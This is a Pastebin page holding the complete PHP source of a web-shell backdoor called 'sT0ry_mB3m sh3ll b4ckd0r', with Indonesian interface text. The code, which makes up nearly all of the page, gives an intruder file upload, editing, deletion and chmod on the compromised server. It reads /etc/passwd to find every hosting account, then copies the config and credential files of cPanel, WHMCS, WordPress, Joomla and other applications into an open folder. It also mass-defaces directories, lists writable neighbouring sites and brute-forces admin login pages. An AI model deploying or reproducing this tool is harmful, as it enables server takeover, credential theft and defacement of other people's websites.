API tools faq
paste
Advertisement
sT0ry_mB3m

mini sh3ll mB3m

sT0ry_mB3m
Dec 11th, 2019
46,855
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.36 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4.  
  5. if(get_magic_quotes_gpc()){
  6. foreach($_POST as $key=>$value){
  7. $_POST[$key] = stripslashes($value);
  8. }
  9. }
  10. echo '<!DOCTYPE HTML>
  11. <html>
  12. <head>
  13. <link href="" rel="stylesheet" type="text/css">
  14. <title>mB3m</title>
  15. <style>
  16. body{
  17. background-color: black;
  18. color:silver;
  19. }
  20. #content tr:hover{
  21. background-color: silver;
  22. text-shadow:0px 0px 10px #fff;
  23. }
  24. #content .first{
  25. background-color: red;
  26. }
  27. table{
  28. border: 1px #000000 dotted;
  29. }
  30. a{
  31. color:white;
  32. text-decoration: none;
  33. }
  34. a:hover{
  35. color:silver;
  36. text-shadow:0px 0px 10px #ffffff;
  37. }
  38. input,select,textarea{
  39. border: 2px #00ff00 dotted;
  40. -moz-border-radius: 5px;
  41. -webkit-border-radius:5px;
  42. border-radius:5px;
  43. }
  44. </style>
  45. </head>
  46. <body>
  47. <h1><tt><center><font color="red">sT0ry_mB3m sh3ll b4ckd0r<br></font></center></h1></tt>
  48. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  49. <tr><td><font color="white">Path :</font> ';
  50. if(isset($_GET['path'])){
  51. $path = $_GET['path'];
  52. }else{
  53. $path = getcwd();
  54. }
  55. $path = str_replace('\\','/',$path);
  56. $paths = explode('/',$path);
  57.  
  58. foreach($paths as $id=>$pat){
  59. if($pat == '' && $id == 0){
  60. $a = true;
  61. echo '<a href="?path=/">/</a>';
  62. continue;
  63. }
  64. if($pat == '') continue;
  65. echo '<a href="?path=';
  66. for($i=0;$i<=$id;$i++){
  67. echo "$paths[$i]";
  68. if($i != $id) echo "/";
  69. }
  70. echo '">'.$pat.'</a>/';
  71. }
  72. echo '</td></tr><tr><td>';
  73. if(isset($_FILES['file'])){
  74. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  75. echo '<font color="green">Upload Berhasil</font><br />';
  76. }else{
  77. echo '<font color="red">Upload Gagal</font><br/>';
  78. }
  79. }
  80. echo '<form enctype="multipart/form-data" method="POST">
  81. <font color="white">File Upload :</font> <input type="file" name="file" />
  82. <input type="submit" value="upload" />
  83. </form>
  84. </td></tr>';
  85. echo "<center><a href='?'>Home |</a><a href='? sT0rymB3m=info'> sistem info | </a><a href='?dir=$dir&do=config'>Config | </a>
  86. <a href='?dir=$dir&do=mass_deface'>Mass Deface | </a><br>
  87. <a href='?dir=$dir&do=jumping'>Jumping | </a>
  88. <a href='?07=finder'> adfinder | </a>
  89. <a href='?sT0rymB3m=sym'>symlink</a>";
  90. if($_GET['sT0rymB3m'] == 'sym') {
  91. echo '<table width="600" border="600" align=center><tr><td>
  92. <center>
  93. <h1><tt><font color="red">coming soon</h1></font></tt>
  94. </center>
  95. </td></tr>
  96. </table>';
  97. }
  98. if($_GET['sT0rymB3m'] == 'info') {
  99. echo '<table width="600" border="600" align=center><tr><td>
  100. <center>
  101. System : ' . $sys . '<br>
  102. IP : ' . $ip . '<br>
  103. Safe Mode : ' . $sm . '<br>
  104. Disabled Functions : ' . $ds . '<br>
  105. Home_root : ' . $home_r . '
  106. </center>
  107. </td></tr>
  108. </table>';
  109. }
  110. if($_GET['do'] == 'config') {
  111. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  112. $idx = mkdir("sT0rymB3m_07", 0777);
  113. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  114. $htc = fopen("sT0rymB3m_07/.htaccess","w");
  115. fwrite($htc, $isi_htc);
  116. while($passwd = fgets($etc)) {
  117. if($passwd == "" || !$etc) {
  118. echo "<font color=red>Can't read /etc/passwd</font>";
  119. } else {
  120. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  121. foreach($user_config[1] as $user_idx) {
  122. $user_config_dir = "/home/$user_idx/public_html/";
  123. if(is_readable($user_config_dir)) {
  124. $grab_config = array(
  125. "/home/$user_idx/.my.cnf" => "cpanel",
  126. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  127. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  128. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  129. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  130. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  131. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  132. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  133. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  134. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  135. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  136. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  137. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  138. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  139. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  140. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  141. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  142. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  143. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  144. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  145. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  146. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  147. foreach($grab_config as $config => $nama_config) {
  148. $ambil_config = file_get_contents($config);
  149. if($ambil_config == '') {
  150. } else {
  151. $file_config = fopen("sT0rymB3m_07/$user_idx-$nama_config.txt","w");
  152. fputs($file_config,$ambil_config);
  153. }
  154. }
  155. }
  156. }
  157. }
  158. }
  159. echo "<center><a href='?dir=$dir/sT0rymB3m_07'><font color=silver>Done</font></a></center>";
  160. }
  161. if($_GET['do'] == 'mass_deface') {
  162. function sabun_massal($dir,$namafile,$isi_script) {
  163. if(is_writable($dir)) {
  164. $dira = scandir($dir);
  165. foreach($dira as $dirb) {
  166. $dirc = "$dir/$dirb";
  167. $lokasi = $dirc.'/'.$namafile;
  168. if($dirb === '.') {
  169. file_put_contents($lokasi, $isi_script);
  170. } elseif($dirb === '..') {
  171. file_put_contents($lokasi, $isi_script);
  172. } else {
  173. if(is_dir($dirc)) {
  174. if(is_writable($dirc)) {
  175. echo "[<font color=blue>DONE</font>] $lokasi<br>";
  176. file_put_contents($lokasi, $isi_script);
  177. $idx = sabun_massal($dirc,$namafile,$isi_script);
  178. }
  179. }
  180. }
  181. }
  182. }
  183. }
  184. function sabun_biasa($dir,$namafile,$isi_script) {
  185. if(is_writable($dir)) {
  186. $dira = scandir($dir);
  187. foreach($dira as $dirb) {
  188. $dirc = "$dir/$dirb";
  189. $lokasi = $dirc.'/'.$namafile;
  190. if($dirb === '.') {
  191. file_put_contents($lokasi, $isi_script);
  192. } elseif($dirb === '..') {
  193. file_put_contents($lokasi, $isi_script);
  194. } else {
  195. if(is_dir($dirc)) {
  196. if(is_writable($dirc)) {
  197. echo "[<font color=blue>DONE</font>] $dirb/$namafile<br>";
  198. file_put_contents($lokasi, $isi_script);
  199. }
  200. }
  201. }
  202. }
  203. }
  204. }
  205. if($_POST['start']) {
  206. if($_POST['tipe_sabun'] == 'mahal') {
  207. echo "<div style='margin: 5px auto; padding: 5px'>";
  208. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  209. echo "</div>";
  210. } elseif($_POST['tipe_sabun'] == 'murah') {
  211. echo "<div style='margin: 5px auto; padding: 5px'>";
  212. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  213. echo "</div>";
  214. }
  215. } else {
  216. echo "<center>";
  217. echo "<form method='post'>
  218. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  219. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  220. <font style='text-decoration: underline;'>Folder:</font><br>
  221. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  222. <font style='text-decoration: underline;'>Filename:</font><br>
  223. <input type='text' name='d_file' value='st0rymb3m.php' style='width: 450px;' height='10'><br>
  224. <font style='text-decoration: underline;'>Index File:</font><br>
  225. <textarea name='script' style='width: 450px; height: 200px;'>hacked by ./sT0ry_mB3m</textarea><br>
  226. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  227. </form></center>";
  228. }
  229.  
  230. }
  231. if($_GET['do'] == 'jumping') {
  232. $i = 0;
  233. echo "<div class='margin: 5px auto;'>";
  234. if(preg_match("/hsphere/", $dir)) {
  235. $urls = explode("\r\n", $_POST['url']);
  236. if(isset($_POST['jump'])) {
  237. echo "<pre>";
  238. foreach($urls as $url) {
  239. $url = str_replace(array("http://","www."), "", strtolower($url));
  240. $etc = "/etc/passwd";
  241. $f = fopen($etc,"r");
  242. while($gets = fgets($f)) {
  243. $pecah = explode(":", $gets);
  244. $user = $pecah[0];
  245. $dir_user = "/hsphere/local/home/$user";
  246. if(is_dir($dir_user) === true) {
  247. $url_user = $dir_user."/".$url;
  248. if(is_readable($url_user)) {
  249. $i++;
  250. $jrw = "[<font color=blue>R</font>] <a href='?dir=$url_user'><font color=lavender>$url_user</font></a>";
  251. if(is_writable($url_user)) {
  252. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$url_user'><font color=lavender>$url_user</font></a>";
  253. }
  254. echo $jrw."<br>";
  255. }
  256. }
  257. }
  258. }
  259. if($i == 0) {
  260. } else {
  261. echo "<br>Total ada ".$i." Kamar di ".$ip;
  262. }
  263. echo "</pre>";
  264. } else {
  265. echo '<center>
  266. <form method="post">
  267. List Domains: <br>
  268. <textarea name="url" style="width: 500px; height: 250px;">';
  269. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  270. while($getss = fgets($fp)) {
  271. echo $getss;
  272. }
  273. echo '</textarea><br>
  274. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  275. </form></center>';
  276. }
  277. } elseif(preg_match("/vhosts/", $dir)) {
  278. $urls = explode("\r\n", $_POST['url']);
  279. if(isset($_POST['jump'])) {
  280. echo "<pre>";
  281. foreach($urls as $url) {
  282. $web_vh = "/var/www/vhosts/$url/httpdocs";
  283. if(is_dir($web_vh) === true) {
  284. if(is_readable($web_vh)) {
  285. $i++;
  286. $jrw = "[<font color=blue>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  287. if(is_writable($web_vh)) {
  288. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  289. }
  290. echo $jrw."<br>";
  291. }
  292. }
  293. }
  294. if($i == 0) {
  295. } else {
  296. echo "<br>Total ada ".$i." Kamar di ".$ip;
  297. }
  298. echo "</pre>";
  299. } else {
  300. echo '<center>
  301. <form method="post">
  302. List Domains: <br>
  303. <textarea name="url" style="width: 500px; height: 250px;">';
  304. bing("ip:$ip");
  305. echo '</textarea><br>
  306. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  307. </form></center>';
  308. }
  309. } else {
  310. echo "<pre>";
  311. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  312. while($passwd = fgets($etc)) {
  313. if($passwd == '' || !$etc) {
  314. echo "<font color=red>Can't read /etc/passwd</font>";
  315. } else {
  316. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  317. foreach($user_jumping[1] as $user_idx_jump) {
  318. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  319. if(is_readable($user_jumping_dir)) {
  320. $i++;
  321. $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=lavender>$user_jumping_dir</font></a>";
  322. if(is_writable($user_jumping_dir)) {
  323. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=lavender>$user_jumping_dir</font></a>";
  324. }
  325. echo $jrw;
  326. if(function_exists('posix_getpwuid')) {
  327. $domain_jump = file_get_contents("/etc/named.conf");
  328. if($domain_jump == '') {
  329. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  330. } else {
  331. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  332. foreach($domains_jump[1] as $dj) {
  333. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  334. $user_jumping_url = $user_jumping_url['name'];
  335. if($user_jumping_url == $user_idx_jump) {
  336. echo " => ( <u>$dj</u> )<br>";
  337. break;
  338. }
  339. }
  340. }
  341. } else {
  342. echo "<br>";
  343. }
  344. }
  345. }
  346. }
  347. }
  348. if($i == 0) {
  349. } else {
  350. echo "<br>Total ada ".$i." Kamar di ".$ip;
  351. }
  352. echo "</pre>";
  353. }
  354. echo "</div>";
  355. }if($_GET['07'] == 'finder') {
  356. echo '<html>
  357. <head>
  358. <meta http-equiv="author" content="The Alchemist"/>
  359. <title>
  360. Admin Page Finder
  361. </title>
  362. </head>
  363. <body bgcolor=white>
  364. <p align="center"><font color="c0c0c0" size="5">Admin Page Finder</font></p>
  365. <form method="POST" action="#">
  366. <p align="center"><font color="c0c0c0">Enter website : </font>
  367. <input type="text" name="url" value="http://"/>
  368. <br>
  369. <input type="submit" name="submit" value="Check"/>
  370. </p>
  371. <br>
  372. <br>';
  373. function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
  374. if($strip_tags) {
  375. $data = strip_tags($data, $allowed_tags . "<b>");
  376. }
  377.  
  378. if(stripos($data, "script") !== false) {
  379. $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
  380. } else {
  381. $result = htmlentities($data, ENT_QUOTES);
  382. }
  383.  
  384. return $result;
  385. }
  386. function urlExist($url)
  387. {
  388. $handle = curl_init($url);
  389. if (false === $handle)
  390. {
  391. return false;
  392. }
  393. curl_setopt($handle, CURLOPT_HEADER, false);
  394. curl_setopt($handle, CURLOPT_FAILONERROR, true);
  395. curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
  396. curl_setopt($handle, CURLOPT_NOBODY, true);
  397. curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
  398. $connectable = curl_exec($handle);
  399. curl_close($handle);
  400. return $connectable;
  401. }
  402. if(isset($_POST['submit']) && isset($_POST['url']))
  403. {
  404. $url= htmlentities(xss_protect($_POST['url']));
  405. if(filter_var($url, FILTER_VALIDATE_URL))
  406. {
  407. $trying = array('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/',
  408. 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
  409. 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
  410. 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
  411. 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
  412. 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
  413. 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
  414. 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
  415. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
  416. 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
  417. 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
  418. 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
  419. 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
  420. 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
  421. 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
  422. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
  423. 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
  424. 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
  425. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
  426. 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
  427. 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
  428. 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
  429. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
  430. 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
  431. 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
  432. 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
  433. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
  434. 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
  435. 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
  436. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
  437. 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
  438. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
  439. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
  440. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
  441. foreach($trying as $sec)
  442. {
  443. $urll=$url.'/'.$sec;
  444. if(urlExist($urll))
  445. {
  446. echo '<p align="center"><font color="00FF00">'.$urll.' exists.<br>MATCH FOUND!!!</font></p>';
  447. exit;
  448. }
  449. else
  450. {
  451. echo '<p align="center"><font color="FFFF00">'.$urll.' does not exist.</font></p>';
  452. }
  453. }
  454. echo '<p align="center"><font color="c0c0c0" size="5">Could not find admin page.</font></p>';
  455. }
  456. else
  457. {
  458. echo '<p align="center"><font color="c0c0c0" size="5">Invalid URL entered.</font></p>';
  459. }
  460. }
  461.  
  462. echo '</body>
  463. </html>';
  464. }
  465. if(isset($_GET['filesrc'])){
  466. echo "<tr><td>Current File : ";
  467. echo $_GET['filesrc'];
  468. echo '</tr></td></table><br />';
  469. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  470. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  471. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  472. if($_POST['opt'] == 'chmod'){
  473. if(isset($_POST['perm'])){
  474. if(chmod($_POST['path'],$_POST['perm'])){
  475. echo '<font color="green">Horee Ubah Permission Berhasil</font><br/>';
  476. }else{
  477. echo '<font color="red">Bangsat Ubah Permission Gagal</font><br />';
  478. }
  479. }
  480. echo '<form method="POST">
  481. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  482. <input type="hidden" name="path" value="'.$_POST['path'].'">
  483. <input type="hidden" name="opt" value="chmod">
  484. <input type="submit" value="Meluncur" />
  485. </form>';
  486. }elseif($_POST['opt'] == 'rename'){
  487. if(isset($_POST['newname'])){
  488. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  489. echo '<font color="green">Ganti Nama Berhasil</font><br/>';
  490. }else{
  491. echo '<font color="red">Ganti Nama Gagal</font><br />';
  492. }
  493. $_POST['name'] = $_POST['newname'];
  494. }
  495. echo '<form method="POST">
  496. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  497. <input type="hidden" name="path" value="'.$_POST['path'].'">
  498. <input type="hidden" name="opt" value="rename">
  499. <input type="submit" value="Meluncur" />
  500. </form>';
  501. }elseif($_POST['opt'] == 'edit'){
  502. if(isset($_POST['src'])){
  503. $fp = fopen($_POST['path'],'w');
  504. if(fwrite($fp,$_POST['src'])){
  505. echo '<font color="green">Berhasil Edit File</font><br/>';
  506. }else{
  507. echo '<font color="red">Gagal Edit File</font><br/>';
  508. }
  509. fclose($fp);
  510. }
  511. echo '<form method="POST">
  512. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  513. <input type="hidden" name="path" value="'.$_POST['path'].'">
  514. <input type="hidden" name="opt" value="edit">
  515. <input type="submit" value="Simpan" />
  516. </form>';
  517. }
  518. echo '</center>';
  519. }else{
  520. echo '</table><br/><center>';
  521. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  522. if($_POST['type'] == 'dir'){
  523. if(rmdir($_POST['path'])){
  524. echo '<font color="green">Directory Terhapus</font><br/>';
  525. }else{
  526. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
  527. }
  528. }elseif($_POST['type'] == 'file'){
  529. if(unlink($_POST['path'])){
  530. echo '<font color="green">File Terhapus</font><br/>';
  531. }else{
  532. echo '<font color="red">File Gagal Dihapus</font><br/>';
  533. }
  534. }
  535. }
  536. echo '</center>';
  537. $scandir = scandir($path);
  538. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  539. <tr class="first">
  540. <td><center>Name</peller></center></td>
  541. <td><center>Size</peller></center></td>
  542. <td><center>Permission</peller></center></td>
  543. <td><center>Last Update</peller></center></td>
  544. <td><center>Modify</peller></center></td>
  545. </tr>';
  546.  
  547. foreach($scandir as $dir){
  548. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  549. echo '<tr>
  550. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  551. <td><center>--</center></td>
  552. <td><center>';
  553. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  554. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  555. echo perms($path.'/'.$dir);
  556. echo"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";
  557. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  558.  
  559. echo '</center></td>
  560. <td><center><form method="POST" action="?option&path='.$path.'">
  561. <select name="opt">
  562. <option value="">Select</option>
  563. <option value="delete">Delete</option>
  564. <option value="chmod">Chmod</option>
  565. <option value="rename">Rename</option>
  566. <input type="submit" value="+">
  567. </select>
  568. <input type="hidden" name="type" value="dir">
  569. <input type="hidden" name="name" value="'.$dir.'">
  570. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  571. </form></center></td>
  572. </tr>';
  573. }
  574. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  575. foreach($scandir as $file){
  576. if(!is_file($path.'/'.$file)) continue;
  577. $size = filesize($path.'/'.$file)/1024;
  578. $size = round($size,3);
  579. if($size >= 1024){
  580. $size = round($size/1024,2).' MB';
  581. }else{
  582. $size = $size.' KB';
  583. }
  584.  
  585. echo '<tr>
  586. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  587. <td><center>'.$size.'</center></td>
  588. <td><center>';
  589. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  590. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  591. echo perms($path.'/'.$file);
  592. echo"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";
  593. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  594. echo '</center></td>
  595. <td><center><form method="POST" action="?option&path='.$path.'">
  596. <select name="opt">
  597. <option value="">Select</option>
  598. <option value="delete">Delete</option>
  599. <option value="chmod">Chmod</option>
  600. <option value="rename">Rename</option>
  601. <option value="edit">Edit</option>
  602. </select>
  603. <input type="hidden" name="type" value="file">
  604. <input type="hidden" name="name" value="'.$file.'">
  605. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  606. <input type="submit" value="+">
  607. </form></center></td>
  608. </tr>';
  609. }
  610.  
  611. echo '</table>
  612. </div>';
  613. }
  614. echo '<center><br/><tt><h2>sT0rymB3m</h2></tt></center>
  615. </body>
  616. </html>';
  617. function perms($file){
  618. $perms = fileperms($file);
  619.  
  620. if (($perms & 0xC000) == 0xC000) {
  621. // Socket
  622. $info = 's';
  623. } elseif (($perms & 0xA000) == 0xA000) {
  624. // Symbolic Link
  625. $info = 'l';
  626. } elseif (($perms & 0x8000) == 0x8000) {
  627. // Regular
  628. $info = '-';
  629. } elseif (($perms & 0x6000) == 0x6000) {
  630. // Block special
  631. $info = 'b';
  632. } elseif (($perms & 0x4000) == 0x4000) {
  633. // Directory
  634. $info = 'd';
  635. } elseif (($perms & 0x2000) == 0x2000) {
  636. // Character special
  637. $info = 'c';
  638. } elseif (($perms & 0x1000) == 0x1000) {
  639. // FIFO pipe
  640. $info = 'p';
  641. } else {
  642. // Unknown
  643. $info = 'u';
  644. }
  645.  
  646. // Owner
  647. $info .= (($perms & 0x0100) ? 'r' : '-');
  648. $info .= (($perms & 0x0080) ? 'w' : '-');
  649. $info .= (($perms & 0x0040) ?
  650. (($perms & 0x0800) ? 's' : 'x' ) :
  651. (($perms & 0x0800) ? 'S' : '-'));
  652.  
  653. // Group
  654. $info .= (($perms & 0x0020) ? 'r' : '-');
  655. $info .= (($perms & 0x0010) ? 'w' : '-');
  656. $info .= (($perms & 0x0008) ?
  657. (($perms & 0x0400) ? 's' : 'x' ) :
  658. (($perms & 0x0400) ? 'S' : '-'));
  659.  
  660. // World
  661. $info .= (($perms & 0x0004) ? 'r' : '-');
  662. $info .= (($perms & 0x0002) ? 'w' : '-');
  663. $info .= (($perms & 0x0001) ?
  664. (($perms & 0x0200) ? 't' : 'x' ) :
  665. (($perms & 0x0200) ? 'T' : '-'));
  666.  
  667. return $info;
  668. }
  669. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!